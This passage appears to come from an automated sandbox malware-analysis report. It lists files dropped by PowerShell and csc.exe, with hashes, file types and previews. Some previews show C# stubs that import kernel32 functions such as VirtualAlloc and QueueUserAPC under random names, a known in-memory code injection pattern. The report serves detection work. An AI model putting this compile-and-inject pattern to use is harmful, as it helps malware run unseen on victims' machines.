                        SHA-512:2BC5537B7D3744A654F9E7D7F13A1C1FCA8FD587700BA36940EE021FC814C82C1ED2E07A9296CFF6754E04C199A3830B11B01A8666565CF657157B0CA7BFECC2
                        Malicious:true
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.634144238857034
                        Encrypted:false
                        SSDEEP:24:etGSM8+mUE7R85z7woel/gNE4/eiDPtkZfjgOTrYu3DZ0WI+ycuZhN+akS2PNnq:62XE7S5gG8iyJjg49ZX1ul+a3Kq
                        MD5:833C125BC415845EE1B8A822DC088C02
                        SHA1:D6A1176ACF053B03DA6D519EAB4EB7017B48A0E8
                        SHA-256:996E609A3921946330E840406C64CD8F7AB162B88504BCE05DCA581E264CD7E3
                        SHA-512:000291790C6E39E5F6D5AA5D4F3C5B2C27C411089C4AA55F7FB26E44B7C00E079F7E9B16F5ECFE20253256C51FF572414ECAA138F75C19A0657B2562733D01B4
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.305483822092941
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzLRE2LIKaM5DqBVKVrdFAMBJTH:Akka6aLRE2LIKxDcVKdBJj
                        MD5:F92374784F54FAECD630C33FDA8432E7
                        SHA1:D7EE4FE021D3E360ABE78C8F6D8F0669ADBB8226
                        SHA-256:6D480811F8E381CACFDB17A10A0FDA08081AF31457C33DD74AE5E466667863C9
                        SHA-512:48ABFF4108A6A3B8D2E38632EF7120BB65D6C0BB124D414B3FFF6B6DF64B914BFD926E3F759B4F05C5CF1598CE47D004E24D77C3A5DD504C74D563D917B61394
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0937098411846407
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryglcak7Ynqq7lxPN5Dlq5J:+RI+ycuZhNqlcakS7lxPNnqX
                        MD5:7BB8DBEA1D7CC9AE6DD3C9DDACDD5B05
                        SHA1:70F372DC7BEC4258A118B2994CF727706C637A6F
                        SHA-256:7E32817C8D9513A2384D66358662E876E51F86C98ED88DCEF8600E517D18EE4B
                        SHA-512:854DF89436FA8D435CFFA8AD3849731BDF6C1DC51ABCB702C67966E54952001EF34C86E6C44F4FB255A4B709C3E71DE9BBC99C82BDE9E997E39810C8F1B55B75
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.l.b.o.m.p.3.2...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.193724877080382
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fkosQoOUzxs7+AEszI923fkosQoM:p37Lvkmb6KzPxUWZE2PL
                        MD5:B5A546325FF70B405A6EDD0E5B93A5B0
                        SHA1:1E9346960956AE815C2BDA5EC359E6D535A870FE
                        SHA-256:D00CA81D76135390A9D1558CDE7562A4BE918C9DE9777A71881B6454A3ECE403
                        SHA-512:11A099697D3417B2E47DABAA93C85D5EE6B3096F48B44B1EE1B37A822EC78DC8B04AD599CFA641FAECB6FC951C9E0F5916A938BA84A09F026EEF36F00494BE6D
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.6346506026861856
                        Encrypted:false
                        SSDEEP:24:etGSR8+mUE7R85z7woel/gXxp4/eiDPtkZf/mB5DZ0WI+ycuZhNqlcakS7lxPNnq:6nXE7S5gGBbiyJ/mBxZX1ulqaa37Bq
                        MD5:32F1B9D17FF5CE273F76E691A3957DA8
                        SHA1:3233B9F58DAA9DF48B43342EE29CC6AD6B8D4178
                        SHA-256:81BBAACB864F40359F08B4E22970E88F040D833B132CF5E48765A22CEE909384
                        SHA-512:D1B55F658650A21F57676944AE121C986A3FB3E6092FFACC61B59EDD5AFC7F695F6292C8AB281AF716B88DDAB7BCCAF2DC03D1BE27CEE8C992ABCC5904D87640
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.308132284793118
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzPx1E2PKKaM5DqBVKVrdFAMBJTH:Akka6aPx1E2PKKxDcVKdBJj
                        MD5:7E8A8641A737C70C899C4179EDDFC967
                        SHA1:3D6B8AB11FC9BF77D4395D19B1F8555B94768BB2
                        SHA-256:542B3D61A71514E012405F6DA07489BEEAEC5F0454D4CB25967E2BABCC896873
                        SHA-512:681789A5B72DA601257B45D36839BC0D1F422AE4B440D2A467ECD19552A2A8E00D8D686EE3B835508026643F184F955F221A4EBFC86DD02BDC111C966CEEC55A
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.2527558218035555
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f6LKafLXzxs7+AEszI923f6LKafLSn:p37Lvkmb6KzSOafrWZE2SOafGn
                        MD5:0E1A4FB543233681B29500DF56AA6F57
                        SHA1:8184927FBC93A8FCE2FD8CDCEC13AC2F88FB8306
                        SHA-256:EADB21BF3DAE2990213DE43C3E98CBAA88F21623B1B6A918BEE662FEEFB42507
                        SHA-512:8B62C9B1DE30ABD20A4C74F4D9697A9E681275136986C384D12084DE41FB94DC7FB8C843E9AF851B0576CF89C26D7A127FC9B966BCDC953F89C0F9F956BAAAFC
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"
                        C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.3183379397344765
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzSOafIE2SOafGuKaM5DqBVKVrdFAMBJTH:Akka6aSOeIE2SOeHKxDcVKdBJj
                        MD5:7241074EE55D01DA6C48E3A1DED01E88
                        SHA1:8221789569283A548A8860B38CE838E40150866B
                        SHA-256:FAF7AEF162FB9D7E43C8A189411C11D62BB1990731351E8520ED648937EE5A97
                        SHA-512:B7EF07709729A576FE4718BCA73B0CB499EBB5FEDF2323101207C6D4C5A9A41F64137EF3FA75F502B59CF391C85D65F5E70EB1AE0A46E787C83DC4A0268271BC
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ro0kv1nw\ro0kv1nw.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.109921450738045
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grydThak7YnqqsTGPN5Dlq5J:+RI+ycuZhNtakS7PNnqX
                        MD5:1DF567DCC97B0A7A089824364B677531
                        SHA1:F78BFB839164EEA3C6373359223DF1E347ABAAF3
                        SHA-256:E9775CAE51FE4CF3AE6BD9573077DBCB268034D0940A69E9E8020305F210E05E
                        SHA-512:EA75DC230C2B40003F3FB9ECBB6252FF72AFAC23751E0FA6C72C006A435CECCC93D70F245302BD2402B161D11FDE48F521138FDC6348DD7F8ECC8CEFAB23BC05
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.222902776745778
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fhQHgUzxs7+AEszI923fhQHs9:p37Lvkmb6Kz5QHDWZE25QHs9
                        MD5:06D22660044726226847AB9E405CDCA3
                        SHA1:0FB2A0C3CFCD8C7F2B1DDBB956ABDABBFA1CB06D
                        SHA-256:EE83EE6D67E2174D63373BE421E6411D81997D2C20B757074BED1C71EC273790
                        SHA-512:5A6F2E94B557B234CC1E12BF643048A3A797453ECF8885F6D44B8CD4B2415330C9C4A95E0CFEF4BEB30E5165CE630D4F0805195BD16BAE7FE6FA84374814475F
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.6349672358126073
                        Encrypted:false
                        SSDEEP:24:etGSD8+mUE7R85z7woel/gx4/eiDPtkZfZzwLDZ0WI+ycuZhNtakS7PNnq:6BXE7S5gGjiyJZzwZX1ulta3xq
                        MD5:90EE0F91FF3E5AC8250C42785D163FB7
                        SHA1:13276BD1000D8F797C73C9B4BCA08127868C1EC9
                        SHA-256:E7251525735F9C3302CDE3DBF5F1796096283241712C20F38F5C4F64EA73070D
                        SHA-512:921B418BE5E4FC2F4D49CBCE1B323721E125F50C832A8E5A66037C7EB41230D29113DA342EF0A050A0DD9423A3AE96562D67682CF84D06DF77001A879A5B6E49
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.320077744261521
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzXE2V4KaM5DqBVKVrdFAMBJTH:Akka6aXE2V4KxDcVKdBJj
                        MD5:5D4927D1B228C0B04BE990A5CF5142D1
                        SHA1:BA0F046F862F9C11763D08A4CF8D3920EA250AD1
                        SHA-256:4C6B817FC7F440DE8C31AD988B1CCEA218531E2BCC2FDDBBF79F1AC6EA07E95E
                        SHA-512:94F287FF11ACB9E1772EF97E61C2B408DC85086F92DCBDECB69D6180F67EC2F3DCD7BAED33CCDB9E8F2CD507E458D07298962F8C62B481AEA9F39B293C0BDE9D
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.255365080899839
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fiVCWzxs7+AEszI923fiVCr:p37Lvkmb6KzKVCWWZE2KVCr
                        MD5:7C6E6D084FD264B37BCD7CC2BFAF1523
                        SHA1:197FBFFC51C699B27EB6EB0C914E044103B1503E
                        SHA-256:1EAA871B794C66E8F63C4EAC98E9110E562B64B2C81CE1F4B380ACF378EA0BB1
                        SHA-512:51B70D5DB9523935220EBD45501021056DEC17D6CFD1A016FF19060E8B5980E809F468D040F06ADBF8F013093301D2106286136F2F818153CC127E9AA3442277
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"
                        C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.335054980168907
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzKwnE2KwqKaM5DqBVKVrdFAMBJTH:Akka6aPE2iKxDcVKdBJj
                        MD5:D25692BE4A7B9E0D1859FED2E0B81B64
                        SHA1:5686819FE68A92F329686AEDF4CDD3CC8DA92609
                        SHA-256:D1260E5FC02624D38E533E5DB33FC83912F8A907509D4C1809BAB069CDDB8912
                        SHA-512:3560116FF740032B6B93CA22BDB32481B7CDEFEAC20A1577F1B95FD465B04F5281AED4F4DFD25C3B5CABEF38073ED50421991A8D62B3E22E7B62FE47CD62CB5D
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\wfv0d1vy\wfv0d1vy.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.1139785671928237
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGak7Ynqq0PN5Dlq5J:+RI+ycuZhNoakS0PNnqX
                        MD5:74AC8729B044EF3E55CA0A024EFF165F
                        SHA1:CBFB0EA2703141E51FB43DA9F9288DA871566FB7
                        SHA-256:C9AF660105465928BE198DBDEB8D4BE5BA9D1B3048299AEB4CA1678D0E829480
                        SHA-512:E4B800C3568143FB841E0B86831C9ECFE1165EB81A17A885755C419CE4DA1E9CAEEA927893336E8F5F0EADACA2295DB5AA983F18D8E2E48A71846F4BFC87BFCA
                        Malicious:false
